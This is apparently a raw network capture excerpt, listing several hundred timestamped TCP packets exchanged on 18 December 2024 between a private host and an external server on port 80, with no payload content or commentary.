                                                                  Dec 18, 2024 13:49:53.306829929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.307091951 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.307332993 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.307846069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.308104992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.308149099 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.308819056 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.309057951 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.309269905 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.309842110 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.310094118 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.310226917 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.310826063 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.311036110 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.311345100 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.311877966 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.312141895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.312329054 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.313596964 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.313616037 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.313713074 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.313915014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.314156055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.314239979 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.315037012 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.315285921 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.315344095 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.315895081 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.364924908 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.461982012 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.462004900 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.462204933 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.462305069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.462539911 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.462737083 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.462950945 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.463165045 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.463252068 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.463524103 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.464359045 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.464435101 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.464647055 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.465127945 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.465250015 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.465332985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.466157913 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.466330051 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.466351986 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.466928005 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.467035055 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.467084885 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.467828035 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.468086958 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.468101025 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.469094992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.469204903 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.469283104 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.470149040 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.470329046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.470339060 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.471121073 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.471327066 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.471333981 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.472160101 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.472230911 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.472423077 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.473038912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.473093987 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.473217010 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.473828077 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.473908901 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.473961115 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.474834919 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.474890947 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.475064039 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.475778103 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.475824118 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.475958109 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.476819038 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.477062941 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.477072001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.477942944 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.478017092 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.478141069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.479051113 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.479119062 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.479197979 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.479986906 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.480098963 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.480143070 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.480808973 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.480921030 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.481029034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.481826067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.481895924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.482103109 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.482872009 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.483082056 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.483089924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.483792067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.483836889 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.484144926 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.484864950 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.484920025 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.485037088 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.485934973 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.486016989 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.486042976 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.486947060 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.487282991 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.487370014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.487962008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.488215923 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.488426924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.488848925 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.489043951 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.489068031 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.490009069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.490109921 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.490374088 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.490885019 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.491000891 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.491049051 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.491884947 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.491995096 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.492310047 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.492862940 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.492985010 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.493143082 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.493885040 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.493957043 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.494168997 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.494971991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.495060921 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.495076895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.495944977 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.496109009 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.496133089 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.496865034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.497102022 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.497160912 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.497997046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.498157024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.498539925 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.499103069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.499150038 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.499191046 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.499943972 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.500159979 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.500472069 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.501123905 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.501209021 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.501389980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.502291918 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.502372980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.502410889 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.502991915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.503068924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.503154993 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.503915071 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.503966093 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.504192114 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.504985094 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.505028963 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.505140066 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.505995989 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.506058931 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.506131887 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.507148981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.507227898 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.507237911 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.507956982 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.508099079 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.508157969 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.508949995 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.509057045 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.509183884 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.510361910 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.510531902 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.510705948 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.511389017 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.511523962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.511586905 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.512010098 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.512218952 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.512288094 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.513094902 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.513148069 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.513341904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.556566000 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.653119087 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.653359890 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.653419018 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.653853893 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.654191017 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.654303074 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.654582024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.655052900 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.655155897 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.655349970 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.656060934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.656141043 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.656223059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.657252073 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.657310963 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.657320976 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.657963991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.658060074 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.658189058 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.659054041 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.659181118 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.659311056 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.660060883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.660110950 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.660233974 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.660994053 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.661042929 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.661242008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.662209034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.662223101 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.662281036 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.663032055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.663078070 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.663350105 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.664107084 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.664186954 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.664361954 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.665128946 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.665205002 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.665247917 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.666074991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.666204929 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.666296959 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.667279959 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.667310953 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.667371035 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.668050051 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.668107033 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.668271065 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.669107914 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.669153929 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.669346094 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.670126915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.670236111 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.670281887 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.671350002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.671498060 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.671519995 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.672319889 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.672363043 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.672569036 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.673239946 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.673296928 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.673368931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.674082994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.674168110 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.674293041 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.675120115 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.675291061 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.675340891 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.676126003 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.676213026 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.676376104 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.677138090 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.677283049 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.677469015 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.678157091 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.678267002 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.678333998 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.679147959 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.679227114 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.679359913 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.680239916 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.680311918 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.680394888 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.681190968 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.681334019 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.681404114 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.682245970 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.682305098 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.682404995 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.683108091 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.683207035 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.683346033 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.684139013 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.684317112 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.684336901 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.685185909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.685275078 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.685364008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.686182022 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.686340094 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.686378002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.687180996 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.687294006 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.687422991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.688335896 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.688395977 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.688410044 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.689330101 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.689483881 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.689528942 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.690655947 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.690829992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.690876007 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.691294909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.691426992 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.691498995 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.692279100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.692471981 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.692492008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.693504095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.693550110 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.693595886 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.694276094 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.694408894 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.694495916 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.695245981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.695302010 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.695442915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.696336985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.696422100 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.696496010 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.697289944 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.697360992 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.697437048 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.698206902 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.698295116 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.698431015 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.699249029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.699378967 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:53.699428082 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:53.700232029 CET8049822176.113.115.178192.168.2.6
